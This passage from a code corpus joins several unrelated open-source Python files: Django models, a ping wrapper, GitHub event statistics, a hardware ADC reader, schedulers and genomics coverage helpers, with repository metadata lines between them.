def get_facebook_url(self):
url = 'https://www.facebook.com/sharer.php'
url += '?&t=' + urlquote(self.get_share_text()) + '&u=' + urlquote(self.get_share_url())
return url
def get_google_plus_url(self):
url = 'https://plus.google.com/share'
url += '?url=' + urlquote(self.get_share_url())
return url
def get_app_net_url(self):
url = 'https://alpha.app.net/intent/post?text='
url += urlquote(self.get_share_text() + " " + self.get_share_url())
return url
class Meta:
ordering = ['-date_added']
verbose_name = _('Research Request')
verbose_name_plural = _('Research Requests')
class CommentRelation(models.Model):
comment = models.ForeignKey('Comment')
help_text = _('Type of the related object (ProjectPart, Question, Participant, Event, Document).')
limit = RELATION_LIMIT
content_type = models.ForeignKey(ContentType, help_text=help_text, limit_choices_to=limit)
help_text = _('The id of the related object (you can find the id of an object in the url \
of the object change form in the admin).')
object_id = models.PositiveIntegerField(help_text=help_text)
content_object = GenericForeignKey('content_type', 'object_id')
help_text = _("Page number in document")
page = models.IntegerField(_("Page"), blank=True, null=True, help_text=help_text)
def __unicode__(self):
return unicode(self.comment) + ', ' + unicode(self.content_object)
class Meta:
verbose_name = _('Relation with Project Element')
verbose_name_plural = _('Relations with Project Elements')
class Comment(models.Model):
username = models.CharField(_("Username"), max_length=250)
email = models.EmailField(_("Email"), max_length=250)
help_text = _('User has given permission to get in contact via email.')
feedback_allowed = models.BooleanField(_("Feedback allowed"), default=False, help_text=help_text)
comment = models.TextField(_("Comment text"))
help_text = _('Comment is only shown on page if published is true.')
published = models.BooleanField(_("Published"), default=False, help_text=help_text)
published_by = models.CharField(_("Published by"), max_length=250, blank=True)
activation_hash = models.CharField(_("Activation hash"), max_length=250, blank=True)
date_added = models.DateTimeField(auto_now_add=True)
activities = GenericRelation('ActivityLog')
def __unicode__(self):
return self.username + ", " + datetime.strftime(self.date_added, '%d.%m.%Y')
def get_feed_description(self):
html = self.comment
html += '<br><br>'
html += _("Commented contents") + ':'
for cr in self.commentrelation_set.all():
html += '<br><a href="' + cr.content_object.get_absolute_url() + '">' + unicode(cr.content_object) + '</a>'
return html
def get_absolute_url(self):
first_co = self.commentrelation_set.all()[0].content_object
return first_co.get_absolute_url() + '?comment_id=' + unicode(self.id)
@classmethod
def get_color(cls):
return '#555';
@classmethod
def get_icon_class(cls):
return 'icon-comment';
def get_share_text(self):
co1 = list(self.commentrelation_set.all())[0].content_object
short_title = 'ProjectWatch'
if SiteConfig.objects.count() > 0:
site_config = SiteConfig.objects.all()[0]
short_title = site_config.short_title
share_text = _('Comment on %s on') % short_title
share_text += ' "' + unicode(co1) + '"'
share_text += ":"
return share_text
def get_share_url(self):
share_url = 'http://%s%s' % (Site.objects.get_current().domain, self.get_absolute_url())
return share_url
def get_twitter_url(self):
url = 'https://twitter.com/intent/tweet'
url += '?&text=' + urlquote(self.get_share_text()) + '&url=' + urlquote(self.get_share_url())
return url
def get_facebook_url(self):
url = 'https://www.facebook.com/sharer.php'
url += '?&t=' + urlquote(self.get_share_text()) + '&u=' + urlquote(self.get_share_url())
return url
def get_google_plus_url(self):
url = 'https://plus.google.com/share'
url += '?url=' + urlquote(self.get_share_url())
return url
def get_app_net_url(self):
url = 'https://alpha.app.net/intent/post?text='
url += urlquote(self.get_share_text() + " " + self.get_share_url())
return url
class Meta:
ordering = ['-date_added']
verbose_name = _('Comment')
verbose_name_plural = _('Comments')
class ActivityLog(models.Model):
TYPE_CHOICES = (
('NA', _('New Subject Area')),
('NQ', _('New Question')),
('PA', _('New Participant')),
('NE', _('Event')),
('ND', _('New Document')),
('RR', _('Research Request')),
('NC', _('Comment')),
)
content_type = models.ForeignKey(ContentType)
object_id = models.PositiveIntegerField()
content_object = GenericForeignKey('content_type', 'object_id')
type = models.CharField(_("Type"), max_length=2, choices=TYPE_CHOICES)
info = models.CharField(_("Info"), max_length=250, blank=True)
date = models.DateTimeField(_("Date"), auto_now_add=True)
def __unicode__(self):
return u'Activity: ' + unicode(self.content_object)
class Meta:
ordering = ['-date']
verbose_name = _('Activity Log Entry')
verbose_name_plural = _('Activity Log')
@receiver(post_save, sender=ProjectPart)
def add_na_activity(sender, instance, created, **kwargs):
if created:
al = ActivityLog(content_object=instance, type='NA')
al.save()
@receiver(post_save, sender=Question)
def add_nq_activity(sender, instance, created, **kwargs):
if created:
al = ActivityLog(content_object=instance, type='NQ')
al.save()
@receiver(post_save, sender=Participant)
def add_pa_activity(sender, instance, created, **kwargs):
if created:
al = ActivityLog(content_object=instance, type='PA')
al.save()
@receiver(post_save, sender=Event)
def add_ne_activity(sender, instance, created, **kwargs):
if created:
al = ActivityLog(content_object=instance, type='NE')
al.save()
@receiver(post_save, sender=Document)
def add_nd_activity(sender, instance, created, **kwargs):
if created:
al = ActivityLog(content_object=instance, type='ND')
al.save()
@receiver(post_save, sender=ResearchRequest)
def add_rr_activity(sender, instance, created, **kwargs):
if created:
al = ActivityLog(content_object=instance, type='RR')
al.save()
| bsd-3-clause | -5,233,854,238,499,547,000 | 40.294686 | 172 | 0.621175 | false |
ConPaaS-team/conpaas | conpaas-director/cpsdirector/common.py | 1 | 1843 | from flask import request, make_response
import os
from pwd import getpwnam
from grp import getgrnam
from ConfigParser import ConfigParser
# TODO: why not use SafeConfigParser() ??
config_parser = ConfigParser()
CONFFILE = os.getenv('DIRECTOR_CFG')
if not CONFFILE:
CONFFILE = "/etc/cpsdirector/director.cfg"
# Config values for unit testing
if os.getenv('DIRECTOR_TESTING'):
CONFFILE = 'director.cfg.example'
config_parser.read(CONFFILE)
# from conpaas.core import https
# https.client.conpaas_init_ssl_ctx('/etc/cpsdirector/certs', 'director')
if os.getenv('DIRECTOR_TESTING'):
if not config_parser.has_section('iaas'):
config_parser.add_section('iaas')
if not config_parser.has_section('director'):
config_parser.add_section('director')
# dummy cloud
config_parser.set("iaas", "DRIVER", "dummy")
config_parser.set("iaas", "USER", "dummy")
# separate database
config_parser.set("director", "DATABASE_URI", "sqlite:///director-test.db")
config_parser.set("director", "DIRECTOR_URL", "")
# dummy data dir for manifests
config_parser.set("director", "USERDATA_DIR", "/tmp/")
def get_director_url():
return config_parser.get("director", "DIRECTOR_URL")
def get_userdata_dir():
return config_parser.get("director", "USERDATA_DIR")
def chown(path, username, groupname):
os.chown(path, getpwnam(username).pw_uid, getgrnam(groupname).gr_gid)
def log(msg):
try:
print >> request.environ['wsgi.errors'], msg
except RuntimeError:
print msg
def log_error(msg):
log('ERROR: %s' % msg)
def build_response(data):
response = make_response(data)
response.headers['Access-Control-Allow-Origin'] = '*'
response.headers['Connection'] = 'close'
return response
def error_response(message):
return { 'error': message }
| bsd-3-clause | 8,926,462,167,972,592,000 | 25.710145 | 79 | 0.687466 | false |
povellesto/blobygames | Blob Rage App/random/wg.py | 1 | 1147 | import turtle
#turtle.ht()
turtle.title("RWG")
turtle.speed(1)
def square():
turtle.forward(5)
turtle.left(90)
turtle.forward(5)
turtle.left(90)
turtle.forward(5)
turtle.left(90)
turtle.forward(5)
def window():
turtle.color("white")
turtle.begin_fill()
square()
turtle.end_fill()
def wooden_door():
turtle.color("brown")
turtle.begin_fill()
square()
turtle.left(270)
square()
square()
square()
square()
turtle.right(90)
turtle.forward(5)
square()
square()
turtle.end_fill()
def stone_door():
turtle.color("dark gray")
turtle.begin_fill()
square()
turtle.left(270)
square()
square()
square()
square()
turtle.right(90)
turtle.forward(5)
square()
square()
turtle.end_fill()
def wood():
turtle.color("brown")
turtle.begin_fill()
square()
turtle.end_fill()
def stone():
turtle.color("dark gray")
turtle.begin_fill()
square()
turtle.end_fill()
def wooden_house():
wooden_door()
wooden_house()
turtle.exitonclick() | unlicense | 648,242,123,662,026,400 | 14.306667 | 29 | 0.571927 | false |
ekorian/deploypl | deployer/ping.py | 1 | 2563 | """
ping.py
pinger module
@author: K.Edeline
"""
import re
import subprocess
_pingopt_count = "-c"
_pingopt_deadline = "-w"
_pingopt_quiet = "-q"
regex1 = re.compile(r'PING ([a-zA-Z0-9.\-]+) \(')
regex2 = re.compile(r'(\d+) packets transmitted, (\d+) received')
regex3 = re.compile(r'(\d+.\d+)/(\d+.\d+)/(\d+.\d+)/(\d+.\d+)')
def ping_process(dipaddr, progname='ping', deadline=5, quiet=True, period=None, count=1):
"""
return a ping subprocess.Popen
"""
ping_argv = [progname]
if quiet:
ping_argv += [_pingopt_quiet]
if period is not None:
ping_argv += [_pingopt_period, str(period)]
if count is not None:
ping_argv += [_pingopt_count, str(count)]
if deadline is not None:
ping_argv += [_pingopt_deadline, str(deadline)]
ping_argv += [str(dipaddr)]
# Run subprocess
try:
p=subprocess.Popen(ping_argv, stdout=subprocess.PIPE)
except subprocess.CalledProcessError:
pass
return p
def ping_parse(ping_output):
"""
Parses the `ping_output` string into a dictionary containing the following
fields:
`host`: *string*; the target hostname that was pinged
`sent`: *int*; the number of ping request packets sent
`received`: *int*; the number of ping reply packets received
`minping`: *float*; the minimum (fastest) round trip ping request/reply
time in milliseconds
`avgping`: *float*; the average round trip ping time in milliseconds
`maxping`: *float*; the maximum (slowest) round trip ping time in
milliseconds
`jitter`: *float*; the standard deviation between round trip ping times
in milliseconds
"""
host = _get_match_groups(ping_output, regex1)[0]
sent, received = _get_match_groups(ping_output, regex2)
try:
minping, avgping, maxping, jitter = _get_match_groups(ping_output,
regex3)
except:
minping, avgping, maxping, jitter = ['NaN']*4
return {'host': host, 'sent': int(sent), 'received': int(received),
'minping': minping, 'avgping': avgping, 'maxping': maxping,
'jitter': jitter}
def _get_match_groups(ping_output, regex):
match = regex.search(ping_output)
if not match:
raise PingException('Non standard ping output:\n' + ping_output)
return match.groups()
class PingException(Exception):
"""
PingException(Exception)
"""
def __init__(self, value):
self.value = value
def __str__(self):
return repr(self.value)
| bsd-3-clause | 7,018,626,121,032,329,000 | 27.477778 | 89 | 0.616855 | false |
knightsamar/github-edu-effectiveness | event_utils.py | 1 | 10612 | from store import connect
from github import Github, NamedUser
from settings import COURSE_REPO, COURSE_REPO_NAME
class GitHubEventsInfo(object):
username = None
commits_made = None
pull_requests_made = None
forks_created = None
issues_created = None
issues_resolved = None
repositories_created = None
def __init__(self, username):
if type(username) is unicode or type(username) is str:
u = Github().get_user(username) #verify that such user exists on Github
if u is not None:
self.username = username
else:
raise Exception("No such user exists on Github currently! Aborting!")
elif type(username) is NamedUser.NamedUser:
self.username = username.login
else:
raise Exception("Not a valid username!")
print "Username :", self.username
def get_commits_made(self):
'''
Gives back:
number of commits made on the course repo
number of commits made on the course repo's fork
number of commits made on other repos before the course started
number of commits made on other repos after the course ended
'''
#TODO: Further filter the commits on other repos based on date.
#get data
db = connect()
on_course_repo = db.events.find({
'actor.login' : self.username,
'repo.name' : COURSE_REPO,
'type' : 'PushEvent',
})
on_course_repo_fork = db.events.find({
'actor.login' : self.username,
'repo.name' : '%s/%s' % (self.username, COURSE_REPO_NAME),
'type' : 'PushEvent',
})
on_other_repos = db.events.find({
'actor.login' : self.username,
'repo.name' : {'$nin' : [COURSE_REPO, '%s/%s' % (self.username, COURSE_REPO_NAME)]},
'type' : 'PushEvent',
})
#store data
self.commits_made = {}
self.commits_made['on_course_repo'] = {
'pushes' : on_course_repo.count(), #total pushes
'commits' : sum([push['payload']['size'] for push in on_course_repo],0), #sum total of commits in each push
'repos' : on_course_repo.distinct('repo.name')
}
self.commits_made['on_course_repo_fork'] = {
'pushes' : on_course_repo_fork.count(),
'commits' : sum([push['payload']['size'] for push in on_course_repo_fork],0),
'repos' : on_course_repo_fork.distinct('repo.name'),
}
self.commits_made['on_other_repos'] = {
'pushes' : on_other_repos.count(),
'commits' : sum([push['payload']['size'] for push in on_other_repos],0),
'repos' : on_other_repos.distinct('repo.name'),
}
return self.commits_made
#TODO: Further filter the pull requests on other repos based on date.
def get_pull_requests_made(self):
'''
Gives back:
number of pull requests made on the course repo
number of pull requests made on the course repo's fork
number of pull requests made on other repos before the course started
number of pull requests made on other repos after the course ended
'''
#get data
db = connect()
on_course_repo = db.events.find({
'actor.login' : self.username,
'repo.name' : COURSE_REPO, #TODO: Figure out why repo.full_name doesn't work here!
'type' : 'PullRequestEvent',
})
on_other_repos = db.events.find({
'actor.login' : self.username,
'repo.name' : {'$nin' : [COURSE_REPO, '%s/%s' % (self.username, COURSE_REPO_NAME)]},
'type' : 'PullRequestEvent',
})
#store data
self.pull_requests_made = {}
self.pull_requests_made['on_course_repo'] = {
'count' : on_course_repo.count(), #total pull requests
'repos' : on_course_repo.distinct('repo.name')
}
self.pull_requests_made['on_other_repos'] = {
'count' : on_other_repos.count(),
'repos' : on_other_repos.distinct('repo.name'),
}
return self.pull_requests_made
#TODO: GET AND STORE all get_forks() data for all users in a forks collection in MongoDB and use it here.
#TODO: Further filter the forks based on date.
def get_forks_created(self):
'''
get the details of any forks that were created by the user of
the course repo
other repos before the course started
other repos after the course ended
'''
#get data
db = connect()
of_course_repo = db.events.find({
'actor.login' : self.username,
'repo.name' : COURSE_REPO,
'type' : 'ForkEvent',
})
of_other_repos = db.events.find({
'actor.login' : self.username,
'repo.name' : {'$ne' : COURSE_REPO},
'type' : 'ForkEvent',
})
#store data
self.forks_created = {}
self.forks_created['of_course_repo'] = {
'count' : of_course_repo.count(), #total forks created -- I know this weird but it is 0400 hrs and I hv more imp things in code to worry about
'fork_of' : of_course_repo.distinct('repo.name')
}
self.forks_created['of_other_repos'] = {
'count' : of_other_repos.count(), #total forks created
'fork_of' : of_other_repos.distinct('repo.name')
}
return self.forks_created
def get_issues_created(self):
'''
Gets the details of any issues OPENED or REOPENED by the user on
1. the course repo
2. fork of the course repo
3. other repos before the course started
4. other repos after the course ended
'''
#TODO: Further filter the issues based on date as required by 3) and 4) above
db = connect()
#get data
on_course_repo = db.events.find({
'actor.login' : self.username,
'repo.name' : COURSE_REPO,
'type' : 'IssuesEvent',
'payload.action': { '$in' : ['opened','reopened']},
})
on_course_repo_fork = db.events.find({
'actor.login' : self.username,
'repo.name' : '%s/%s' % (self.username, COURSE_REPO_NAME),
'type' : 'IssuesEvent',
'payload.action': { '$in' : ['opened','reopened']},
})
on_other_repos = db.events.find({
'actor.login' : self.username,
'repo.name' : {'$nin' : [COURSE_REPO, '%s/%s' % (self.username, COURSE_REPO_NAME)]},
'type' : 'IssuesEvent',
'payload.action': { '$in' : ['opened','reopened']},
})
#store the data
self.issues_created = {}
self.issues_created['on_course_repo'] = {
'count' : on_course_repo.count(),
'repos' : on_course_repo.distinct('repo.name'),
}
self.issues_created['on_course_repo_fork'] = {
'count' : on_course_repo_fork.count(),
'repos' : on_course_repo_fork.distinct('repo.name'),
}
self.issues_created['on_other_repos'] = {
'count' : on_other_repos.count(),
'repos' : on_other_repos.distinct('repo.name'),
}
return self.issues_created
def get_issues_resolved(self):
'''
Gets the details of any issues CLOSED by the user on
1. the course repo
2. fork of the course repo
3. other repos before the course started
4. other repos after the course ended
'''
#TODO: Further filter the issues based on date as required by 3) and 4) above
db = connect()
#get data
on_course_repo = db.events.find({
'actor.login' : self.username,
'repo.name' : COURSE_REPO,
'type' : 'IssuesEvent',
'payload.action': 'closed',
})
on_course_repo_fork = db.events.find({
'actor.login' : self.username,
'repo.name' : '%s/%s' % (self.username, COURSE_REPO_NAME),
'type' : 'IssuesEvent',
'payload.action': 'closed',
})
on_other_repos = db.events.find({
'actor.login' : self.username,
'repo.name' : {'$nin' : [COURSE_REPO, '%s/%s' % (self.username, COURSE_REPO_NAME)]},
'type' : 'IssuesEvent',
'payload.action': 'closed',
})
#store the data
self.issues_resolved = {}
self.issues_resolved['on_course_repo'] = {
'count' : on_course_repo.count(),
'repos' : on_course_repo.distinct('repo.name'),
}
self.issues_resolved['on_course_repo_fork'] = {
'count' : on_course_repo_fork.count(),
'repos' : on_course_repo_fork.distinct('repo.name'),
}
self.issues_resolved['on_other_repos'] = {
'count' : on_other_repos.count(),
'repos' : on_other_repos.distinct('repo.name'),
}
return self.issues_resolved
#TODO: Actually ensure that the repos are not FORKS!
def get_repositories_created(self):
'''
get the details of any repositories that were created by the user
which are NOT forks (as they are already covered by get_forks_created)
1. repos created before the course started
2. repos created after the course ended
'''
#get data
db = connect()
repos_created = db.events.find({
'actor.login' : self.username,
'type' : 'CreateEvent',
'payload.ref_type' : 'repository',
})
#store data
self.repositories_created = {}
self.repositories_created = {
'count' : repos_created.count(),
'repos' : repos_created.distinct('repo.name')
}
return self.repositories_created
| gpl-2.0 | 2,656,363,513,471,674,000 | 34.972881 | 163 | 0.516773 | false |
bwc126/MLND-Subvocal | pcf8591read.py | 1 | 1785 | #! /usr/bin/env python3
"""
This file is for gathering EMG data using the Q2W I2C PCF8591 ADC Breakout Board with a Raspberry PI. It's best used in conjunction with a script to control recording flow. See "simple_svr.py" for the actual control flow used.
"""
import sys, time
from quick2wire.parts.pcf8591 import *
from quick2wire.i2c import I2CMaster
#from vis import volt_plot
from writefile import *
from tkinter import *
class adc_reader():
def __init__(self):
self.address = int(sys.argv[1]) if len(sys.argv) > 1 else BASE_ADDRESS
self.pin_index1 = int(sys.argv[2]) if len(sys.argv) > 2 else 0
self.pin_index2 = int(sys.argv[3]) if len(sys.argv) > 3 else 1
self.record = False
def run(self, filename):
with I2CMaster() as i2c:
adc = PCF8591(i2c, THREE_DIFFERENTIAL)
pin1 = adc.differential_input(1)
count = 0
start = time.time()
with open(filename, 'w') as csvfile:
fieldnames = ['time', 'count', 'voltage']
writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
writer.writeheader()
while self.record:
reading = ''
voltage = pin1.value * 3.3
strength = ['-' for i in range(int(pin1.value*256))]
disp = ''
for dash in strength:
disp += dash
print (disp)
#sleep(0.1)
count += 1
current = time.time() - start
#data[count] = pin1.raw_value
#volt_plot(count, data)
writer.writerow({'time': current, 'count': count, 'voltage': voltage})
| mit | 6,554,003,415,954,009,000 | 34.7 | 227 | 0.538375 | false |
uclouvain/osis | education_group/ddd/domain/service/postpone_group.py | 1 | 3713 | ##############################################################################
#
# OSIS stands for Open Student Information System. It's an application
# designed to manage the core business of higher education institutions,
# such as universities, faculties, institutes and professional schools.
# The core business involves the administration of students, teachers,
# courses, programs and so on.
#
# Copyright (C) 2015-2020 Université catholique de Louvain (http://www.uclouvain.be)
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# A copy of this license - GNU General Public License - is available
# at the root of the source code of this program. If not,
# see http://www.gnu.org/licenses/.
#
##############################################################################
from typing import Dict, List
from base.models.authorized_relationship import AuthorizedRelationshipList
from education_group.calendar.education_group_switch_calendar import EducationGroupSwitchCalendar
from education_group.ddd import command
from education_group.ddd.domain.exception import GroupCopyConsistencyException
from education_group.ddd.domain.group import Group
from education_group.ddd.domain.service.conflicted_fields import Year, FieldLabel
from osis_common.ddd import interface
from osis_common.ddd.interface import ApplicationService
from program_management.ddd.domain.service.calculate_end_postponement import CalculateEndPostponement
class PostponeOrphanGroup(interface.DomainService):
@classmethod
def postpone(
cls,
updated_group: 'Group',
conflicted_fields: Dict[Year, List[FieldLabel]],
end_postponement_calculator: 'CalculateEndPostponement',
copy_group_service: ApplicationService,
authorized_relationships: 'AuthorizedRelationshipList',
calendar: 'EducationGroupSwitchCalendar'
):
identities = []
closest_working_year = min(calendar.get_target_years_opened())
is_in_past = updated_group.year < closest_working_year
if not is_in_past and authorized_relationships.is_mandatory_child_type(updated_group.type):
# means that this group has been automatically created by the system
# behind 'trainings' and 'minitrainings' Nodes/groups in ProgramTree
end_postponement_year = end_postponement_calculator.calculate_end_postponement_year_for_orphan_group(
group=updated_group
)
for year in range(updated_group.year, end_postponement_year):
if year + 1 in conflicted_fields:
break # Do not copy info from year to N+1 because conflict detected
identity_next_year = copy_group_service(
command.CopyGroupCommand(
from_code=updated_group.code,
from_year=year
)
)
identities.append(identity_next_year)
if conflicted_fields:
first_conflict_year = min(conflicted_fields.keys())
raise GroupCopyConsistencyException(first_conflict_year, conflicted_fields[first_conflict_year])
return identities
| agpl-3.0 | -980,645,893,848,153,000 | 49.849315 | 113 | 0.66945 | false |
botswana-harvard/edc-call-manager | edc_call_manager/mixins.py | 1 | 1561 | from django.apps import apps as django_apps
from django.core.exceptions import MultipleObjectsReturned
from django.db import models
app_config = django_apps.get_app_config('edc_call_manager')
class CallLogLocatorMixin(models.Model):
"""A Locator model mixin that has the Locator model update the Log if changed."""
def save(self, *args, **kwargs):
self.update_call_log()
super(CallLogLocatorMixin, self).save(*args, **kwargs)
def get_call_log_model(self):
"""If using the edc_call_manager, return the Log model so it can be updated."""
try:
return django_apps.get_model(app_config.label, 'log')
except LookupError:
return None
def get_call_log_options(self):
"""If using the edc_call_manager, return the Log model filter options."""
return dict(call__registered_subject=self.registered_subject)
def update_call_log(self):
"""If using the edc_call_manager, update the Log model otherwise do nothing."""
Log = self.get_call_log_model()
if Log:
try:
log = Log.objects.get(**self.get_call_log_options())
log.locator_information = self.to_string()
log.save()
except MultipleObjectsReturned:
for log in Log.objects.filter(**self.get_call_log_options()):
log.locator_information = self.to_string()
log.save()
except Log.DoesNotExist:
pass
class Meta:
abstract = True
| gpl-2.0 | -4,849,253,839,757,369,000 | 35.302326 | 87 | 0.61499 | false |
vicenteneto/PyRESTEasy | tests/helpers/clients.py | 1 | 1153 | import rest_easy
from rest_easy import get, path
@get()
def test_get():
pass
@path('path')
def test_path():
pass
class ClientAsObject(object):
@get()
def test_get(self):
pass
class ClientWithoutTarget(rest_easy.Client):
@get()
def test_get(self):
pass
class GetClient(rest_easy.Client):
_target = 'http://www.google.com/'
@get()
def test_get_without_define_kwargs(self):
pass
@get()
def test_get_with_named_arguments(self, first_param=None, second_param=None):
pass
@get()
def test_get_with_default_arguments(self, first_param='first', second_param=None):
pass
@get()
def test_get_with_non_valid_default_arguments(self, first_param=object(), second_param=None):
pass
@get()
def test_get(self, **kwargs):
pass
@get()
@path('path')
def test_get_before_another_decorator(self):
pass
class PathClient(rest_easy.Client):
_target = 'http://www.google.com'
@path('path')
def test_path_without_get(self):
pass
@path('path')
@get()
def test_path(self):
pass
| mit | -1,962,198,361,716,257,300 | 16.469697 | 97 | 0.597572 | false |
ucsd-ccbb/Oncolist | src/server/TCGA/IDAppender.py | 1 | 5654 | __author__ = 'guorongxu'
import os
import sys
## To process JSON files and append an id for each document.
def process_louvain_cluster_json(workspace, data_set):
root_json_dir = workspace + "/" + data_set + "/louvain_json_files"
##id number rule:
# the first digital "2" is the cluster index id;
# the first two digital "02" is the TCGA louvain cluster type id;
# the last sever digital "0000000" is the id.
id_num = 2020000000
for dirpath, directories, filenames in os.walk(root_json_dir):
for filename in filenames:
if filename.find(".json") > -1 and filename.find("gamma") > -1:
input_file = os.path.join(dirpath, filename)
output_file = input_file.replace(".json", ".json.new")
if not os.path.exists(output_file):
filewriter = open(output_file, "a")
with open(input_file) as fp:
lines = fp.readlines()
for line in lines:
if line.startswith("curl -XPOST"):
filewriter.write(line.replace(" -d", "/" + str(id_num) + " -d"))
id_num = id_num + 1
else:
filewriter.write(line)
fp.closed
filewriter.close()
## To process JSON files and append an id for each document.
def process_ivanovska_cluster_json(workspace, data_set):
root_json_dir = workspace + "/" + data_set + "/ivanovska_json_files"
##id number rule:
# the first digital "2" is the cluster index id;
# the first two digital "03" is the TCGA ivanovska cluster type id;
# the last sever digital "0000000" is the id.
id_num = 2030000000
for dirpath, directories, filenames in os.walk(root_json_dir):
for filename in filenames:
if filename.find(".json") > -1 and filename.find("gamma") > -1:
input_file = os.path.join(dirpath, filename)
output_file = input_file.replace(".json", ".json.new")
if not os.path.exists(output_file):
filewriter = open(output_file, "a")
with open(input_file) as fp:
lines = fp.readlines()
for line in lines:
if line.startswith("curl -XPOST"):
filewriter.write(line.replace(" -d", "/" + str(id_num) + " -d"))
id_num = id_num + 1
else:
filewriter.write(line)
fp.closed
filewriter.close()
## To process JSON files and append an id for each document.
def process_oslom_cluster_json(workspace, data_set):
root_json_dir = workspace + "/" + data_set + "/oslom_undirected_json_files"
##id number rule:
# the first digital "2" is the cluster index id;
# the first two digital "04" is the TCGA oslom cluster type id;
# the last sever digital "0000000" is the id.
id_num = 2040000000
for dirpath, directories, filenames in os.walk(root_json_dir):
for filename in filenames:
if filename.find(".json") > -1 and filename.find("gamma") > -1:
input_file = os.path.join(dirpath, filename)
output_file = input_file.replace(".json", ".json.new")
if not os.path.exists(output_file):
filewriter = open(output_file, "a")
with open(input_file) as fp:
lines = fp.readlines()
for line in lines:
if line.startswith("curl -XPOST"):
filewriter.write(line.replace(" -d", "/" + str(id_num) + " -d"))
id_num = id_num + 1
else:
filewriter.write(line)
fp.closed
filewriter.close()
## To process JSON files and append an id for each document.
def process_star_json(workspace, data_set):
root_json_dir = workspace + "/" + data_set + "/json_files"
##id number rule:
# the first digital "1" is the genes index id;
# the first two digital "02" is the TCGA star type id;
# the last sever digital "0000000" is the id.
id_num = 1020000000
for dirpath, directories, filenames in os.walk(root_json_dir):
for filename in filenames:
if filename.find(".json") > -1 and filename.find("genes_tcga") > -1:
input_file = os.path.join(dirpath, filename)
output_file = input_file.replace(".json", ".json.new")
if not os.path.exists(output_file):
filewriter = open(output_file, "a")
with open(input_file) as fp:
lines = fp.readlines()
for line in lines:
if line.startswith("curl -XPOST"):
filewriter.write(line.replace(" -d", "/" + str(id_num) + " -d"))
id_num = id_num + 1
else:
filewriter.write(line)
fp.closed
filewriter.close()
## Main entry
if __name__ == "__main__":
workspace = sys.argv[1]
data_set = sys.argv[2]
#workspace = "/Users/guorongxu/Desktop/SearchEngine"
#data_set = "TCGA"
process_oslom_cluster_json(workspace, data_set)
#process_star_json(workspace, data_set)
| mit | -3,096,008,627,221,445,000 | 42.160305 | 96 | 0.514857 | false |
openstack/vitrage | vitrage/entity_graph/scheduler.py | 1 | 2977 | # Copyright 2018 - Nokia
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from concurrent.futures import ThreadPoolExecutor
from futurist import periodics
from oslo_config import cfg
from oslo_log import log
from vitrage.datasources import utils
from vitrage.common.constants import DatasourceAction
from vitrage.common.utils import spawn
CONF = cfg.CONF
LOG = log.getLogger(__name__)
class Scheduler(object):
def __init__(self, graph, driver_exec, persist, consistency_enforcer):
super(Scheduler, self).__init__()
self.graph = graph
self.driver_exec = driver_exec
self.persist = persist
self.consistency = consistency_enforcer
self.periodic = None
def start_periodic_tasks(self, immediate_get_all):
thread_num = len(utils.get_pull_drivers_names())
thread_num += 2 # for consistency and get_all
self.periodic = periodics.PeriodicWorker.create(
[], executor_factory=lambda: ThreadPoolExecutor(
max_workers=thread_num))
self._add_consistency_timer()
self._add_datasource_timers(immediate_get_all)
spawn(self.periodic.start)
def _add_consistency_timer(self):
spacing = CONF.datasources.snapshots_interval
@periodics.periodic(spacing=spacing)
def consistency_periodic():
try:
self.consistency.periodic_process()
except Exception:
LOG.exception('run_consistency failed.')
self.periodic.add(consistency_periodic)
LOG.info("added consistency_periodic (spacing=%s)", spacing)
def _add_datasource_timers(self, run_immediately):
spacing = CONF.datasources.snapshots_interval
@periodics.periodic(spacing=spacing, run_immediately=run_immediately)
def get_all_periodic():
self.driver_exec.snapshot_get_all(DatasourceAction.SNAPSHOT)
self.periodic.add(get_all_periodic)
LOG.info("added get_all_periodic (spacing=%s)", spacing)
driver_names = utils.get_pull_drivers_names()
for d_name in driver_names:
spacing = CONF[d_name].changes_interval
@periodics.periodic(spacing=spacing)
def get_changes_periodic(driver_name=d_name):
self.driver_exec.get_changes(driver_name)
self.periodic.add(get_changes_periodic)
LOG.info("added get_changes_periodic %s (spacing=%s)",
d_name, spacing)
| apache-2.0 | -1,596,756,444,141,159,000 | 34.86747 | 77 | 0.675512 | false |
robinandeer/chanjo-report | chanjo_report/server/blueprints/report/utils.py | 1 | 6697 | from __future__ import division
import itertools
import logging
from flask import abort, flash
from sqlalchemy.exc import OperationalError
from sqlalchemy import func
from chanjo.store.models import Transcript, TranscriptStat, Sample
from chanjo.sex import predict_sex
from chanjo_report.server.constants import LEVELS
from chanjo_report.server.extensions import api
LOG = logging.getLogger(__name__)
def transcript_coverage(api, gene_id, *sample_ids):
"""Return coverage metrics per transcript for a given gene."""
query = (api.query(TranscriptStat)
.join(TranscriptStat.transcript)
.filter(Transcript.gene_id == gene_id)
.order_by(TranscriptStat.transcript_id,
TranscriptStat.sample_id))
if sample_ids:
query = query.filter(TranscriptStat.sample_id.in_(sample_ids))
tx_groups = itertools.groupby(query, key=lambda tx: tx.transcript_id)
return tx_groups
def map_samples(group_id=None, sample_ids=None):
if group_id:
query = Sample.query.filter(Sample.group_id == group_id)
elif sample_ids:
query = Sample.query.filter(Sample.id.in_(sample_ids))
else:
query = Sample.query
try:
samples = {sample_obj.id: sample_obj for sample_obj in query}
return samples
except OperationalError as error:
LOG.exception(error)
api.session.rollback()
return abort(500, 'MySQL error, try again')
def samplesex_rows(sample_ids):
"""Generate sex prediction info rows."""
sex_query = (api.query(
TranscriptStat.sample_id,
Transcript.chromosome,
func.avg(TranscriptStat.mean_coverage)
).join(
TranscriptStat.transcript
).filter(
Transcript.chromosome.in_(['X', 'Y']),
TranscriptStat.sample_id.in_(sample_ids)
).group_by(
TranscriptStat.sample_id,
Transcript.chromosome
))
samples = itertools.groupby(sex_query, lambda row: row[0])
for sample_id, chromosomes in samples:
